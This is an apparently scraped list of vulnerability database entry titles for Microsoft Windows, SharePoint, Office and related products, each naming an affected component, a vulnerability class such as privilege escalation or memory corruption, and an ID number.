Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160871] Microsoft Windows up to Server 2019 NTFS privilege escalation [160870] Microsoft Windows up to Server 2019 Active Directory Federation Service 2FA weak authentication [160869] Microsoft Windows up to Server 2019 DNS privilege escalation [160866] Microsoft Windows up to Server 2019 Cryptographic Catalog Service privilege escalation [160865] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160861] Microsoft Windows up to Server 2019 RSoP Service Application privilege escalation [160856] Microsoft SharePoint Server 2013 SP1/2016/2019 API information disclosure [160855] Microsoft Windows up to Server 2019 Media Audio Decoder memory corruption [160854] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160853] Microsoft Windows up to Server 2019 Media Audio Decoder privilege escalation [160852] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 ASP.Net Web Control privilege escalation [160851] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160850] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160849] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160848] Microsoft Windows up to Server 2019 GDI+ memory corruption [160847] Microsoft Windows up to Server 2019 memory corruption [160846] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160845] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160843] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160841] Microsoft Windows up to Server 2019 Camera Codec Pack memory corruption [160840] Microsoft Windows up to Server 2019 Microsoft COM for Windows memory corruption [160839] Microsoft Windows up to Server 2019 Text Service Module memory corruption [159610] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159608] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159606] Microsoft Excel up to 2019 memory corruption [159604] Microsoft Windows up to Server 2019 Storage Service privilege escalation [159601] Microsoft Windows up to Server 2019 Speech Shell privilege escalation [159600] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [159599] Microsoft Excel up to 2019 information disclosure [159597] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159596] Microsoft Excel 2010 SP2 memory corruption [159595] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159594] Microsoft Windows up to Server 2019 Windows Runtime memory corruption [159593] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159592] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159591] Microsoft Windows up to Server 2019 Work Folder Service memory corruption [159589] Microsoft Windows up to Server 2019 State Repository Service information disclosure [159588] Microsoft Windows up to Server 2019 CDP User memory corruption [159587] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159585] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [159584] Microsoft Windows up to Server 2019 WaasMedic Service information disclosure [159582] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [159578] Microsoft Outlook up to 2019 information disclosure [159571] Microsoft Windows up to Server 2019 UPnP Device Host memory corruption [159569] Microsoft Word up to 2019 information disclosure [159568] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159567] Microsoft Windows up to Server 2019 GDI memory corruption [159566] Microsoft Windows up to Server 2019 Remote Access memory corruption [159564] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [159563] Microsoft Windows up to Server 2019 Custom Protocol Engine memory corruption [159561] Microsoft Windows up to Server 2019 Kernel information disclosure [159558] Microsoft Windows up to Server 2019 Kernel privilege escalation [159557] Microsoft Windows up to Server 2019 Font Driver Host memory corruption [159556] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159555] Microsoft Windows up to Server 2019 Backup Service privilege escalation [159553] Microsoft Windows up to Server 2019 Telephony Server privilege escalation [159552] Microsoft Windows up to Server 2019 CDP User memory corruption [159550] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159549] Microsoft Word up to 2019 information disclosure [159548] Microsoft Windows up to Server 2019 Backup Engine privilege escalation [159547] Microsoft Excel up to 2019 memory corruption [159545] Microsoft Windows up to Server 2019 GDI privilege escalation [159544] Microsoft Excel up to 2019 memory corruption [159543] Microsoft Windows up to Server 2019 Kernel memory corruption [159542] Microsoft Windows up to Server 2019 Hard Link privilege escalation [159541] Microsoft Windows up to Server 2019 Remote Access memory corruption [159540] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159539] Microsoft Windows up to Server 2019 Radio Manager API memory corruption [159537] Microsoft Windows up to Server 2019 Accounts Control memory corruption [159534] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159531] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159530] Microsoft Windows up to Server 2019 Media Foundation information disclosure [159529] Microsoft Windows up to Server 2019 Network Connection Broker privilege escalation [159528] Microsoft Windows up to Server 2019 Ancillary Function Driver for WinSock privilege escalation [159526] Microsoft Windows up to Server 2019 Public Account Pictures Folder privilege escalation [159524] Microsoft Windows up to Server 2019 Win32k information disclosure [159523] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159522] Microsoft Windows up to Server 2019 DirectWrite information disclosure [159521] Microsoft Windows up to Server 2019 SSDP Provider privilege escalation [159518] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159517] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159513] Microsoft Windows up to Server 2019 DirectX privilege escalation [159512] Microsoft Windows up to Server 2019 Kernel privilege escalation [159504] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159503] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159499] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159497] Microsoft Windows up to Server 2019 Media Audio Codec memory corruption [159495] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159494] Microsoft Windows up to Server 2019 Media Foundation memory corruption [158019] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157995] Microsoft Windows up to Server 2019 WalletService information disclosure [157993] Microsoft Windows up to Server 2019 WalletService privilege escalation [157991] Microsoft Windows up to Server 2019 Update Stack privilege escalation [157990] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [157989] Microsoft Windows up to Server 2019 Delivery Optimization Service privilege escalation [157986] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157985] Microsoft Windows up to Server 2019 Profile Service privilege escalation [157984] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157983] Microsoft Windows up to Server 2019 Kernel privilege escalation [157981] Microsoft Windows up to Server 2019 Kernel information disclosure [157979] Microsoft Windows up to Server 2019 Resource Policy information disclosure [157978] Microsoft Windows up to Server 2019 Kernel information disclosure [157977] Microsoft Windows up to Server 2019 Kernel memory corruption [157975] Microsoft Windows up to Server 2019 ALPC privilege escalation [157963] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157960] Microsoft Windows up to Server 2019 Diagnostics Hub privilege escalation [157957] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [157956] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service information disclosure [157955] Microsoft Windows up to Server 2019 Agent Activation Runtime information disclosure [157952] Microsoft Windows up to Server 2019 USO Core Worker privilege escalation [157951] Microsoft Windows up to Server 2019 Storage Services privilege escalation [157950] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157949] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157948] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157946] Microsoft Windows up to Server 2019 lnk File privilege escalation [157945] Microsoft Windows up to Server 2019 Error Reporting information disclosure [157943] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157942] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157941] Microsoft Windows up to Server 2019 Remote Desktop Client memory corruption [157939] Microsoft Windows up to Server 2019 Picker Platform privilege escalation [157938] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157937] Microsoft Windows up to Server 2019 Windows Print Workflow Service privilege escalation [157936] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157935] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157934] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [157933] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157930] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157925] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [157924] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157923] Microsoft Windows up to Server 2019 Network Connections Service privilege escalation [157922] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157921] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157920] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [157919] Microsoft Windows up to Server 2019 Mobile Device Management information disclosure [157918] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [157916] Microsoft Windows up to Server 2019 Windows Address Book privilege escalation [157912] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 cross site scripting [157911] Microsoft SharePoint 2013 SP1/2016/2019 Email Parser privilege escalation [157910] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 cross site scripting [157909] Microsoft SharePoint 2013 SP1/2016/2019 privilege escalation [157907] Microsoft SharePoint 2016/2019 cross site scripting [157906] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Office cross site scripting [157899] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 PerformancePoint Services privilege escalation [157898] Microsoft Outlook up to 2019 memory corruption [157894] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157893] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157892] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157889] Microsoft Windows up to Server 2019 Imaging information disclosure [157888] Microsoft Windows up to Server 2019 Graphics Origin Validation Error [157887] Microsoft Windows up to Server 2019 DirectWrite memory corruption [157886] Microsoft Windows up to Server 2019 Graphics Component memory corruption [157885] Microsoft Windows up to Server 2019 GDI+ memory corruption [157884] Microsoft Windows up to Server 2019 Font Library privilege escalation [157883] Microsoft Windows up to Server 2019 Graphics Component information disclosure [157882] Microsoft Windows up to Server 2019 GDI information disclosure [157877] Microsoft Azure DevOps Server 2019 Update 1/2019 Update 1.1/2019.0.1 cross site scripting [157509] Microsoft Windows up to Server 2019 Codecs Library memory corruption [157508] Microsoft Windows up to Server 2019 Codecs Library memory corruption [156420] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [156419] Microsoft Windows up to Server 2019 LNK privilege escalation [156418] Microsoft Windows up to Server 2019 CAB File privilege escalation [156417] Microsoft Windows up to Server 2019 OLE Automation privilege escalation [156415] Microsoft Windows up to Server 2019 Media Foundation information disclosure [156414] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156413] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156412] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156409] Microsoft Windows up to Server 2019 Kernel privilege escalation [156408] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156407] Microsoft Windows up to Server 2019 Kernel privilege escalation [156406] Microsoft Windows up to Server 2019 Kernel privilege escalation [156404] Microsoft Windows up to Server 2019 Kernel privilege escalation [156403] Microsoft Windows up to Server 2019 Kernel privilege escalation [156402] Microsoft Windows up to Server 2019 Win32k privilege escalation [156398] Microsoft Windows up to Server 2019 Win32k privilege escalation [156397] Microsoft Windows up to Server 2019 Kernel privilege escalation [156395] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156394] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156393] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156385] Microsoft Windows up to Server 2019 Windows Runtime information disclosure [156384] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156382] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [156380] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [156378] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156377] Microsoft Windows up to Server 2019 Registry privilege escalation [156376] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [156375] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [156374] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156373] Microsoft Windows up to Server 2019 Kernel privilege escalation [156372] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156371] Microsoft Windows up to Server 2019 Session Manager privilege escalation [156369] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156368] Microsoft Windows up to Server 2019 Backup Service privilege escalation [156367] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [156365] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service denial of service [156364] Microsoft Windows up to Server 2019 Group Policy privilege escalation [156363] Microsoft Windows up to Server 2019 OpenSSH privilege escalation [156361] Microsoft Windows up to Server 2019 Win32k information disclosure [156359] Microsoft Windows up to Server 2019 Host Guardian Service information disclosure [156358] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156356] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [156354] Microsoft Windows up to Server 2019 Diagnostics/Feedback Settings App information disclosure [156353] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156352] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156351] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156350] Microsoft Windows up to Server 2019 Kernel privilege escalation [156348] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [156347] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156346] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156327] Microsoft SharePoint Foundation 2010 SP2 cross site scripting [156324] Microsoft Office up to 2019 for Mac Outlook information disclosure [156323] Microsoft Excel up to 2019 for Mac memory corruption [156322] Microsoft Excel up to 2019 for Mac memory corruption [156319] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156318] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156317] Microsoft Windows up to Server 2019 GDI privilege escalation [156316] Microsoft Windows up to Server 2019 Kernel privilege escalation [156315] Microsoft Windows up to Server 2019 GDI information disclosure [156314] Microsoft Windows up to Server 2019 Win32k privilege escalation [156313] Microsoft Windows up to Server 2019 GDI privilege escalation [156312] Microsoft Windows up to Server 2019 Graphics Component information disclosure [156311] Microsoft Windows up to Server 2019 Win32k privilege escalation [156310] Microsoft Windows up to Server 2019 DirectX privilege escalation [156309] Microsoft Windows up to Server 2019 Win32k privilege escalation [156302] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156301] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156300] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [156299] Microsoft Azure DevOps Server 2019 Update 1/2019 Update 1.1 privilege escalation [155176] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155175] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155174] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155173] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155172] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155171] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155170] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155169] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155168] Microsoft Windows up to Server 2019 GDI information disclosure [155167] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155166] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155165] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155160] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155158] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155157] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155156] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155155] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155154] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [155153] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155151] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155149] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155148] Microsoft Windows up to Server 2019 Win32k privilege escalation [155147] Microsoft Windows up to Server 2019 GDI privilege escalation [155146] Microsoft Windows up to Server 2019 GDI information disclosure [155145] Microsoft Windows up to Server 2019 DirectX privilege escalation [155144] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155143] Microsoft Windows up to Server 2019 Storage Service privilege escalation [155142] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [155141] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [155140] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155139] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [155138] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155137] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155136] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155135] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155134] Microsoft Windows up to Server 2019 Clipboard Service privilege escalation [155133] Microsoft Windows up to Server 2019 TLS denial of service [155132] Microsoft Windows up to Server 2019 CSRSS information disclosure [155131] Microsoft Windows up to Server 2019 Kernel privilege escalation [155130] Microsoft Windows up to Server 2019 Task Scheduler weak authentication [155129] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [155127] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155126] Microsoft Windows up to Server 2019 Update Stack privilege escalation [155124] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155123] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155122] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [155121] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155120] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155119] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [155118] Microsoft SharePoint Enterprise Server 2016/2019 cross site scripting [155115] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155114] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155112] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155111] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [155110] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155109] Microsoft Windows up to Server 2019 Printer Service privilege escalation [155108] Microsoft Windows up to Server 2019 privilege escalation [155107] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [155106] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155105] Microsoft Windows up to Server 2019 memory corruption [155104] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [155103] Microsoft Windows up to Server 2019 information disclosure [155100] Microsoft Windows up to Server 2019 Media Service privilege escalation [155096] Microsoft Windows up to Server 2019 Script Runtime memory corruption [155092] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [155091] Microsoft Windows up to Server 2019 Win32k privilege escalation [155090] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155089] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [155087] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [155086] Microsoft Windows up to Server 2019 Block Level Backup Engine Service privilege escalation [155084] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [155082] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 information disclosure [155080] Microsoft Windows up to Server 2019 Graphics Component memory corruption [155079] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155078] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155077] Microsoft Windows up to Server 2019 Color Management ICM32.dll memory corruption [155072] Microsoft Windows up to Server 2019 Media Foundation memory corruption [155070] Microsoft SharePoint Enterprise Server 2016/2019 Source Markup privilege escalation [155069] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 ASP.Net Web Control memory corruption [155068] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 Source Markup privilege escalation [155067] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 Source Markup privilege escalation [153289] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [153286] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153284] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153281] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153280] Microsoft Windows up to Server 2019 Push Notification Service information disclosure [153279] Microsoft Windows up to Server 2019 User-Mode Power Service privilege escalation [153278] Microsoft Windows up to Server 2019 Update Client privilege escalation [153277] Microsoft Windows up to Server 2019 System Assessment Tool privilege escalation [153275] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153274] Microsoft Windows up to Server 2019 Kernel information disclosure [153273] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [153272] Microsoft Windows up to Server 2019 Kernel privilege escalation [153270] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153269] Microsoft Windows up to Server 2019 Kernel privilege escalation [153268] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153266] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153265] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153264] Microsoft Windows up to Server 2019 DNS denial of service [153263] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153261] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153259] Microsoft Windows up to Server 2019 Update Stack privilege escalation [153257] Microsoft Windows up to Server 2019 privilege escalation [153256] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153254] Microsoft Office/SharePoint/Word 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 memory corruption [153244] Microsoft Windows up to Server 2019 GDI+ memory corruption [153243] Microsoft Windows up to Server 2019 Win32k information disclosure [153242] Microsoft Office up to 2019 Access Connectivity Engine memory corruption [153241] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153240] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153239] Microsoft Windows up to Server 2019 Kernel information disclosure [153237] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153236] Microsoft Windows up to Server 2019 GDI information disclosure [153234] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153233] Microsoft Windows up to Server 2019 Media Foundation information disclosure [153232] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153230] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [153229] Microsoft Windows up to Server 2019 Notification Service privilege escalation [153227] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153225] Microsoft Windows up to Server 2019 Scheduled Task privilege escalation [153223] Microsoft Windows up to Server 2019 WpcDesktopMonSvc privilege escalation [153214] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153213] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [153212] Microsoft Windows up to Server 2019 Kernel privilege escalation [153210] Microsoft Visual Studio up to 2019 Version 16.5 Extension Installer Service privilege escalation [153209] Microsoft Visual Studio 2017 15.9/2019 16.0/2019 16.4/2019 16.5 Updater Service privilege escalation [153207] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [153206] Microsoft Windows up to Server 2019 DirectX privilege escalation [153204] Microsoft Windows up to Server 2019 information disclosure [153203] Microsoft Windows up to Server 2019 privilege escalation [153200] Microsoft Windows up to Server 2019 Graphics Component information disclosure [153198] Microsoft Windows up to Server 2019 Win32k memory corruption [153196] Microsoft Windows up to Server 2019 Win32k memory corruption [153195] Microsoft Windows up to Server 2019 DirectX privilege escalation [153194] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 privilege escalation [153190] Microsoft Windows up to Server 2019 Codecs Library memory corruption [153189] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153188] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153187] Microsoft Windows up to Server 2019 Media Foundation memory corruption [153185] Microsoft Windows up to Server 2019 Hyper-V memory corruption [153181] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153180] Microsoft Windows up to Server 2019 Adobe Font Manager Library privilege escalation [153176] Microsoft Windows up to Server 2019 Graphics Component memory corruption [153175] Microsoft Windows up to Server 2019 Graphics memory corruption [152075] Microsoft Windows up to Server 2019 Type 1 Font Parser privilege escalation [151174] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151173] Microsoft Exchange Server 2016 CU14/2016 CU15/2019 CU3/2019 CU4 cross site scripting [151171] Microsoft Windows 10 1607/Server 2016 Graphics Component privilege escalation [151170] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151169] Microsoft Windows up to Server 2019 Hardlink privilege escalation [151164] Microsoft Windows up to Server 2019 Win32k privilege escalation [151163] Microsoft Windows up to Server 2019 Graphics Component information disclosure [151162] Microsoft Visual Studio up to 2017 Version 15.9/2019 version 16.4 weak encryption [151161] Microsoft Windows up to Server 2019 GDI information disclosure [151160] Microsoft Windows up to Server 2019 GDI information disclosure [151158] Microsoft Windows up to Server 2019 Win32k privilege escalation [151157] Microsoft Windows up to Server 2019 Win32k information disclosure [151156] Microsoft Windows up to Server 2019 GDI information disclosure [151154] Microsoft Windows up to Server 2019 Network Connections Service information disclosure [151153] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151152] Microsoft Windows up to Server 2019 Update Orchestrator Service privilege escalation [151151] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151150] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151149] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151147] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [151146] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151145] Microsoft Windows up to Server 2019 Modules Installer Service information disclosure [151141] Microsoft Windows up to Server 2019 Imaging information disclosure [151139] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [151138] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151136] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151135] Microsoft Windows up to Server 2019 Hard Link privilege escalation [151132] Microsoft Windows up to Server 2019 Media Foundation information disclosure [151130] Microsoft Azure DevOps Server 2019 Update 1.1 Pipeline Job Token privilege escalation [151129] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151127] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [151114] Microsoft Visual Studio up to 2019 Version 16.4 Extension Installer Service privilege escalation [151113] Microsoft Windows up to Server 2019 Win32k privilege escalation [151112] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [151110] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [151109] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151108] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [151106] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [151104] Microsoft Windows up to Server 2019 Work Folder Service privilege escalation [151103] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [151102] Microsoft Windows up to Server 2019 Error Reporting information disclosure [151101] Microsoft Windows up to Server 2019 GDI information disclosure [151100] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151099] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [151098] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151097] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151096] Microsoft Windows up to Server 2019 CSC Service privilege escalation [151095] Microsoft Windows up to Server 2019 Defender privilege escalation [151091] Microsoft Windows up to Server 2019 DirectX privilege escalation [151088] Microsoft Office 2016 for Mac/2019/Online Server Word memory corruption [151078] Microsoft Windows up to Server 2019 GDI+ memory corruption [151077] Microsoft Windows up to Server 2019 GDI+ memory corruption [151064] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151063] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151062] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151061] Microsoft Windows up to Server 2019 Media Foundation memory corruption [151060] Microsoft Windows up to Server 2019 lnk File privilege escalation [149969] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [149968] Microsoft Office up to 2019 Excel memory corruption [149967] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149966] Microsoft Windows up to Server 2019 Key Isolation Service information disclosure [149963] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149961] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149960] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149959] Microsoft Windows up to Server 2019 Key Isolation Service memory corruption [149958] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [149957] Microsoft Windows up to Server 2019 Graphics Component information disclosure [149956] Microsoft Windows up to Server 2019 Graphics Component privilege escalation [149955] Microsoft Windows up to Server 2019 GDI memory corruption [149954] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149953] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149952] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149951] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [149950] Microsoft Windows up to Server 2019 privilege escalation [149949] Microsoft Windows up to Server 2019 tapisrv.dll privilege escalation [149947] Microsoft Windows up to Server 2019 Windows Search Indexer privilege escalation [149945] Microsoft Windows 10/10 1607/Server 2016 DirectX privilege escalation [149944] Microsoft Windows up to Server 2019 Win32k privilege escalation [149943] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [149942] 